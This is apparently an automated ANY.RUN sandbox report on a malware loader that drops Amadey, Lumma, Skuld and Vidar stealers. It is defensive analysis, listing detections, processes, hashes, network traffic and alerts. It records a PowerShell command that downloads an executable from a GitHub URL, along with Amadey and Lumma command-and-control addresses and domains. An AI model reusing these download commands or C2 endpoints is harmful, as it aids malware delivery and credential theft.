File name: 2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer

Full analysis: https://app.any.run/tasks/7d24b9cb-0eae-4e69-a33d-f7a4d2f82c58
Verdict: Malicious activity
Threats: Amadey
Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Analysis date: April 29, 2025, 13:48:50
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: loader, amadey, botnet, stealer, auto, rdp, auto-sch, skuld, lumma, themida, github, telegram, vidar, stealc
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5: F44CA647CBC2EC8C30E0D56170A67672
SHA1: 82F15E07B71FA0848DE860EEF0AAB8F978CB1E0B
SHA256: D7478FFA0CEDDD28F3168296C16AC97E0B8B88D847CD7A8F9A24497E24FB5ECC
SSDEEP: 49152:3PPkzemqoSut3Jh4+QQ/btosJwIA4hHmZlKH2Tw/Pq83zw0bCjvk9G661QGtf3Xx:/P/mp7t3T4+B/btosJwIA4hHmZlKH2TZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 7344)
    • AMADEY has been found (auto)

      • powershell.exe (PID: 7536)
      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 7536)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7536)
    • AMADEY has been detected (SURICATA)

      • saved.exe (PID: 7820)
    • Connects to the CnC server

      • saved.exe (PID: 7820)
      • svchost.exe (PID: 2196)
    • Request from PowerShell that ran from MSHTA.EXE

      • powershell.exe (PID: 7536)
    • AMADEY has been detected (YARA)

      • saved.exe (PID: 7820)
    • SKULD has been detected

      • AwFCMAP.exe (PID: 7192)
      • AwFCMAP.exe (PID: 4212)
    • LUMMA mutex has been found

      • 2e92a12cfe.exe (PID: 7772)
      • MSBuild.exe (PID: 3884)
      • randrof.exe (PID: 5588)
      • qpzfu.exe (PID: 7316)
      • zb7jDew.exe (PID: 7556)
    • Steals credentials from Web Browsers

      • 2e92a12cfe.exe (PID: 7772)
      • MSBuild.exe (PID: 3884)
      • randrof.exe (PID: 5588)
      • qpzfu.exe (PID: 7316)
      • zb7jDew.exe (PID: 7556)
    • Actions looks like stealing of personal data

      • 2e92a12cfe.exe (PID: 7772)
      • MSBuild.exe (PID: 3884)
      • randrof.exe (PID: 5588)
      • qpzfu.exe (PID: 7316)
      • zb7jDew.exe (PID: 7556)
    • LUMMA has been detected (YARA)

      • 2e92a12cfe.exe (PID: 7772)
      • MSBuild.exe (PID: 3884)
    • Adds path to the Windows Defender exclusion list

      • jYKC9dZ.exe (PID: 7952)
      • cmd.exe (PID: 3240)
      • jYKC9dZ.exe (PID: 5204)
      • cmd.exe (PID: 2340)
    • Changes Windows Defender settings

      • cmd.exe (PID: 3240)
      • cmd.exe (PID: 2340)
    • LUMMA has been detected (SURICATA)

      • svchost.exe (PID: 2196)
      • MSBuild.exe (PID: 5172)
    • VIDAR mutex has been found

      • MSBuild.exe (PID: 7520)
    • Stealers network behavior

      • svchost.exe (PID: 2196)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • 2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7320)
      • jYKC9dZ.exe (PID: 7952)
      • jYKC9dZ.exe (PID: 5204)
      • JSEVGJV.exe (PID: 7636)
    • Probably download files using WebClient

      • mshta.exe (PID: 7364)
    • Connects to the server without a host name

      • powershell.exe (PID: 7536)
      • saved.exe (PID: 7820)
      • MSBuild.exe (PID: 3884)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 7536)
      • saved.exe (PID: 7820)
      • MSBuild.exe (PID: 3884)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7536)
      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)
      • saved.exe (PID: 7820)
      • powershell.exe (PID: 6960)
      • powershell.exe (PID: 6560)
      • cmd.exe (PID: 7220)
    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 7536)
      • saved.exe (PID: 7820)
    • Reads security settings of Internet Explorer

      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)
      • saved.exe (PID: 7820)
      • jYKC9dZ.exe (PID: 5744)
      • jYKC9dZ.exe (PID: 6264)
      • jYKC9dZ.exe (PID: 5204)
      • MSBuild.exe (PID: 7520)
    • Starts itself from another location

      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)
    • Found IP address in command line

      • powershell.exe (PID: 7536)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 7364)
      • cmd.exe (PID: 3240)
      • cmd.exe (PID: 2340)
      • cmd.exe (PID: 924)
      • cmd.exe (PID: 6944)
    • Manipulates environment variables

      • powershell.exe (PID: 7536)
    • Starts process via Powershell

      • powershell.exe (PID: 7536)
    • Contacting a server suspected of hosting an CnC

      • saved.exe (PID: 7820)
      • svchost.exe (PID: 2196)
      • MSBuild.exe (PID: 5172)
    • There is functionality for taking screenshot (YARA)

      • saved.exe (PID: 7820)
      • MSBuild.exe (PID: 3884)
    • There is functionality for enable RDP (YARA)

      • saved.exe (PID: 7820)
    • Uses TASKKILL.EXE to kill Browsers

      • AwFCMAP.exe (PID: 7192)
      • AwFCMAP.exe (PID: 4212)
    • Uses TASKKILL.EXE to kill process

      • AwFCMAP.exe (PID: 7192)
      • AwFCMAP.exe (PID: 4212)
    • Reads the BIOS version

      • 2e92a12cfe.exe (PID: 7772)
    • Process drops legitimate windows executable

      • saved.exe (PID: 7820)
    • Starts a Microsoft application from unusual location

      • 1xtPr6S.exe (PID: 3132)
      • VisualCode.exe (PID: 7552)
      • 47Q6wZM.exe (PID: 7704)
      • AJ2naPd.exe (PID: 6828)
      • 1xtPr6S.exe (PID: 7800)
    • Searches for installed software

      • 2e92a12cfe.exe (PID: 7772)
      • MSBuild.exe (PID: 3884)
      • qpzfu.exe (PID: 7316)
      • randrof.exe (PID: 5588)
    • Application launched itself

      • jYKC9dZ.exe (PID: 5744)
      • jYKC9dZ.exe (PID: 6264)
    • Reads the date of Windows installation

      • jYKC9dZ.exe (PID: 5744)
      • jYKC9dZ.exe (PID: 6264)
      • jYKC9dZ.exe (PID: 5204)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 3240)
      • cmd.exe (PID: 2340)
    • The process executes via Task Scheduler

      • saved.exe (PID: 2560)
      • saved.exe (PID: 7768)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 6960)
      • powershell.exe (PID: 6560)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • MSBuild.exe (PID: 7520)
    • Hides command output

      • cmd.exe (PID: 2568)
      • cmd.exe (PID: 7220)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 2568)
      • cmd.exe (PID: 7220)
    • Executes application which crashes

      • 8d9fc1ac2d.exe (PID: 2776)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 2568)
    • Connects to unusual port

      • MSBuild.exe (PID: 7244)
      • svchost.exe (PID: 776)
  • INFO

    • Reads mouse settings

      • 2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7320)
    • Checks supported languages

      • 2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7320)
      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)
      • saved.exe (PID: 7820)
      • AwFCMAP.exe (PID: 7192)
      • 2e92a12cfe.exe (PID: 7772)
      • 1xtPr6S.exe (PID: 3132)
      • MSBuild.exe (PID: 3884)
      • jYKC9dZ.exe (PID: 5744)
      • jYKC9dZ.exe (PID: 7952)
      • jYKC9dZ.exe (PID: 6264)
      • jYKC9dZ.exe (PID: 5204)
      • saved.exe (PID: 2560)
      • AwFCMAP.exe (PID: 4212)
      • randrof.exe (PID: 5588)
      • VisualCode.exe (PID: 7552)
      • MSBuild.exe (PID: 7520)
      • zb7jDew.exe (PID: 7556)
      • qpzfu.exe (PID: 7316)
    • The sample compiled with english language support

      • 2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7320)
      • saved.exe (PID: 7820)
      • cmd.exe (PID: 7220)
    • Reads the computer name

      • 2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7320)
      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)
      • saved.exe (PID: 7820)
      • 2e92a12cfe.exe (PID: 7772)
      • MSBuild.exe (PID: 3884)
      • jYKC9dZ.exe (PID: 5744)
      • jYKC9dZ.exe (PID: 7952)
      • jYKC9dZ.exe (PID: 6264)
      • jYKC9dZ.exe (PID: 5204)
      • zb7jDew.exe (PID: 7556)
      • MSBuild.exe (PID: 7520)
      • qpzfu.exe (PID: 7316)
    • Create files in a temporary directory

      • 2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7320)
      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)
      • saved.exe (PID: 7820)
      • AwFCMAP.exe (PID: 7192)
    • Auto-launch of the file from Task Scheduler

      • cmd.exe (PID: 7344)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 7364)
    • Checks proxy server information

      • powershell.exe (PID: 7536)
      • saved.exe (PID: 7820)
      • powershell.exe (PID: 6560)
      • MSBuild.exe (PID: 7520)
    • Disables trace logs

      • powershell.exe (PID: 7536)
      • powershell.exe (PID: 6960)
    • The executable file from the user directory is run by the Powershell process

      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)
    • Process checks computer location settings

      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)
      • saved.exe (PID: 7820)
      • jYKC9dZ.exe (PID: 5744)
      • jYKC9dZ.exe (PID: 6264)
      • jYKC9dZ.exe (PID: 5204)
    • Creates files or folders in the user directory

      • saved.exe (PID: 7820)
      • MSBuild.exe (PID: 7520)
    • Drops encrypted JS script (Microsoft Script Encoder)

      • AwFCMAP.exe (PID: 7192)
      • AwFCMAP.exe (PID: 4212)
    • Reads the machine GUID from the registry

      • 2e92a12cfe.exe (PID: 7772)
      • MSBuild.exe (PID: 3884)
      • randrof.exe (PID: 5588)
      • zb7jDew.exe (PID: 7556)
      • MSBuild.exe (PID: 7520)
    • Reads the software policy settings

      • 2e92a12cfe.exe (PID: 7772)
      • MSBuild.exe (PID: 3884)
      • randrof.exe (PID: 5588)
      • qpzfu.exe (PID: 7316)
      • zb7jDew.exe (PID: 7556)
      • MSBuild.exe (PID: 7520)
    • Themida protector has been detected

      • 2e92a12cfe.exe (PID: 7772)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 7144)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 7144)
    • Creates files in the program directory

      • MSBuild.exe (PID: 7520)
    • Attempting to use instant messaging service

      • MSBuild.exe (PID: 7520)
    • Application launched itself

      • chrome.exe (PID: 4188)
      • msedge.exe (PID: 7432)
    • NirSoft software is detected

      • JSEVGJV.exe (PID: 7636)
      • DNS.exe (PID: 6184)
    • Manual execution by a user

      • svchost.exe (PID: 776)

Amadey

(PID) Process: (7820) saved.exe
C2: 185.39.17.163
URL: http://185.39.17.163/Su8kud7i/index.php
Version: 5.34
Options:
Drop directory: c13dbdc4fa
Drop name: saved.exe
Strings (125)

Lumma

(PID) Process: (7772) 2e92a12cfe.exe
C2 (9):
parakehjet.run/kewk
buzzarddf.live/ktnt
zenithcorde.top/auid
bearjk.live/benj
blockhubr.live/jhgf
techguidet.digital/apdo
techsyncq.run/riid
btcgeared.live/lbak
fishgh.digital/tequ

(PID) Process: (3884) MSBuild.exe
C2 (9):
parakehjet.run/kewk
buzzarddf.live/ktnt
zenithcorde.top/auid
bearjk.live/benj
techguidet.digital/apdo
techsyncq.run/riid
btcgeared.live/lbak
vecturar.top/zsia
fishgh.digital/tequ

No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (76.4)
.exe | Win32 Executable (generic) (12.4)
.exe | Generic Win/DOS Executable (5.5)
.exe | DOS Executable Generic (5.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:04:29 11:46:44+00:00
ImageFileCharacteristics: Executable, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 14.16
CodeSize: 633856
InitializedDataSize: 326144
UninitializedDataSize: -
EntryPoint: 0x20577
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (British)
CharacterSet: Unicode
No data.
Total processes: 275
Monitored processes: 143
Malicious processes: 21
Suspicious processes: 6

Behavior graph

Processes tagged in the graph: #AMADEY (powershell.exe, tempt5yx6awvctr5cglrm2ify3mhnxbqoezx.exe, saved.exe), #SKULD (awfcmap.exe), #LUMMA (2e92a12cfe.exe, msbuild.exe, svchost.exe, randrof.exe, qpzfu.exe, zb7jdew.exe), #VIDAR (msbuild.exe). The remaining nodes are untagged cmd.exe, conhost.exe, taskkill.exe, ping.exe, chrome.exe and msedge.exe children.

Process information

PID: 728
CMD: taskkill /F /IM 7star.exe
Path: C:\Windows\System32\taskkill.exe
Parent process: AwFCMAP.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Terminates Processes
Exit code: 128
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 776
CMD: "C:\Windows\System32\svchost.exe"
Path: C:\Windows\SysWOW64\svchost.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Host Process for Windows Services
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 896
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 920
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Parent process: 1xtPr6S.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: MSBuild.exe
Exit code: 0
Version: 4.8.9037.0 built by: NET481REL1
PID: 924
CMD: C:\WINDOWS\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/grosesch/ibra/raw/refs/heads/main/chinainstal.exe' -OutFile 'C:\Users\admin\AppData\Local\lhtdguzdvdxr\randrof.exe'"
Path: C:\Windows\System32\cmd.exe
Parent process: jYKC9dZ.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 1240
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: taskkill.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 1272
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: taskkill.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 1280
CMD: taskkill /F /IM chrome.exe
Path: C:\Windows\System32\taskkill.exe
Parent process: AwFCMAP.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Terminates Processes
Exit code: 128
Version: 10.0.19041.1 (WinBuild.160101.0800)
PID: 1324
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3232 --field-trial-handle=2284,i,16850591164830452302,792526355797790413,262144 --variations-seed-version /prefetch:1
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Microsoft Edge
Exit code: 0
Version: 122.0.2365.59
PID: 1676
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Total events: 77 247
Read events: 77 207
Write events: 40
Delete events: 0

Modification events

(PID) Process: (7364) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (7364) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (7364) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (7536) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0

(PID) Process: (7536) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value: 0

(PID) Process: (7536) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableConsoleTracing
Value: 0

(PID) Process: (7536) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: FileTracingMask
Value:

(PID) Process: (7536) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: ConsoleTracingMask
Value:

(PID) Process: (7536) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: MaxFileSize
Value: 1048576

(PID) Process: (7536) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: FileDirectory
Value: %windir%\tracing
Executable files: 34
Suspicious files: 53
Text files: 83
Unknown types: 13

Dropped files

PID | Process | Filename | Type
7536 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
MD5:8FA51CC07DAB2A8F60F3A6BCF514FBA6
SHA256:93D95229B89E128A7FAF69EB5D5BC52F6B3876943ADBF1EDCFD66A62EE7B6182
7320 | 2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe | C:\Users\admin\AppData\Local\Temp\fY0UHIekF.hta | html
MD5:95B1958691E57BEA7C2F8E6E6E2A0E68
SHA256:D22E256651879766215E086E0E30879F5A3D6E234C6FC089A3FF6F5A8D4E1660
7536 | powershell.exe | C:\Users\admin\AppData\Local\TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE | executable
MD5:F6C20A18AFEAC04964A6CCAD6BE59731
SHA256:CE75F9DEDE6D4E93549D35B816898113B6BEFAB9EF0AADF8949D4887C2C34BEA
7756 | TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE | C:\Windows\Tasks\saved.job | binary
MD5:A5DC79463F28AEF80BA1B18F2ABE3E90
SHA256:CDC9114173DB68BB8BE3B34C0776B4A968EA7DBBC424F65E9F55D91426F6B6C4
7820 | saved.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\AwFCMAP[1].exe | executable
MD5:14CE7C8943F4E123261C8E63E8E70039
SHA256:531472EDF392AAECF9CB3216F9DA57A1B1014AED275E5BF7683915F69C34AFD9
7536 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sv0ruxit.htm.ps1 | text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7192 | AwFCMAP.exe | C:\Users\admin\AppData\Local\Temp\Red.zip | compressed
MD5:76CDB2BAD9582D23C1F6F4D868218D6C
SHA256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
7820 | saved.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCV3KQBA\random[1].exe | executable
MD5:0A840A6FB5E22FB8D5292B6E00374DCB
SHA256:81D396898922A226CDB298845DA43F2529BED1E591DF2C611D66BBCDD43E98E7
7756 | TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE | C:\Users\admin\AppData\Local\Temp\c13dbdc4fa\saved.exe | executable
MD5:F6C20A18AFEAC04964A6CCAD6BE59731
SHA256:CE75F9DEDE6D4E93549D35B816898113B6BEFAB9EF0AADF8949D4887C2C34BEA
7820 | saved.exe | C:\Users\admin\AppData\Local\Temp\10055180101\2e92a12cfe.exe | executable
MD5:0A840A6FB5E22FB8D5292B6E00374DCB
SHA256:81D396898922A226CDB298845DA43F2529BED1E591DF2C611D66BBCDD43E98E7
HTTP(S) requests: 212
TCP/UDP connections: 191
DNS requests: 75
Threats: 85

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
7536 | powershell.exe | GET | 200 | 185.39.17.162:80 | http://185.39.17.162/testmine/random.exe | unknown | malicious
7820 | saved.exe | POST | 200 | 185.39.17.163:80 | http://185.39.17.163/Su8kud7i/index.php | unknown | malicious
- | - | GET | 304 | 172.202.163.200:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | -
6488 | RUXIMICS.exe | GET | 200 | 2.19.11.105:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
8052 | SIHClient.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | whitelisted
7820 | saved.exe | POST | 200 | 185.39.17.163:80 | http://185.39.17.163/Su8kud7i/index.php | unknown | malicious
7820 | saved.exe | GET | 200 | 185.39.17.162:80 | http://185.39.17.162/files/7244183739/AwFCMAP.exe | unknown | malicious
8052 | SIHClient.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
- | - | GET | 200 | 172.202.163.200:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | -
8052 | SIHClient.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
- | - | 51.124.78.146:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
6488 | RUXIMICS.exe | 51.124.78.146:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3216 | svchost.exe | 172.211.123.249:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
6488 | RUXIMICS.exe | 2.19.11.105:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted
6488 | RUXIMICS.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
7536 | powershell.exe | 185.39.17.162:80 | - | Joint Stock Company Tagnet | RU | malicious
7820 | saved.exe | 185.39.17.163:80 | - | Joint Stock Company Tagnet | RU | malicious

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 4.231.128.59 | whitelisted
google.com | 142.250.186.46 | whitelisted
client.wns.windows.com | 172.211.123.249 | whitelisted
crl.microsoft.com | 2.19.11.105, 2.19.11.120, 2.16.164.113, 2.16.164.112 | whitelisted
www.microsoft.com | 95.101.149.131, 2.23.246.101 | whitelisted
slscr.update.microsoft.com | 20.12.23.50 | whitelisted
fe3cr.delivery.mp.microsoft.com | 52.165.164.15 | whitelisted
blockhubr.live | 104.21.32.232, 172.67.156.133 | unknown
vecturar.top | 188.114.97.3, 188.114.96.3 | unknown
activation-v2.sls.microsoft.com | 40.91.76.224 | whitelisted

Threats

PID | Process | Class | Message
7536 | powershell.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 31
7536 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host
7536 | powershell.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP
7536 | powershell.exe | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
7536 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
7536 | powershell.exe | Misc activity | ET INFO Packed Executable Download
7820 | saved.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 31
7820 | saved.exe | Malware Command and Control Activity Detected | BOTNET [ANY.RUN] Amadey HTTP POST Request (st=s)
7820 | saved.exe | Malware Command and Control Activity Detected | ET MALWARE Amadey CnC Response
7820 | saved.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host
No debug info